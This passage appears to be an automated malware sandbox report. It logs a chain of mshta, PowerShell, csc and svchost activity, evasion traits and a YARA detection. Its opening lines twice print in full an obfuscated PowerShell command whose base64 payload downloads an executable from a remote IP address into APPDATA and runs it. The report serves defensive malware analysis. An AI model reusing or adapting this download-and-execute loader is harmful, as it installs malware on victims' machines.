    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04BE42D1 push ebx; ret 3_2_04BE42DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04BE3BB5 pushfd ; retf 3_2_04BE3BB9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7116Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7147Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2438Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dllJump to dropped file
    Source: C:\Windows\SysWOW64\mshta.exe TID: 7404Thread sleep count: 7116 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 7147 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 2438 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -9223372036854770s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 7808Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWvU
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
    Source: powershell.exe, 00000003.00000002.1277241225.000000000881B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2396991694.0000020AE7454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000005.00000002.2395441463.0000020AE1E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`cE
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi32_7552.amsi.csv, type: OTHER
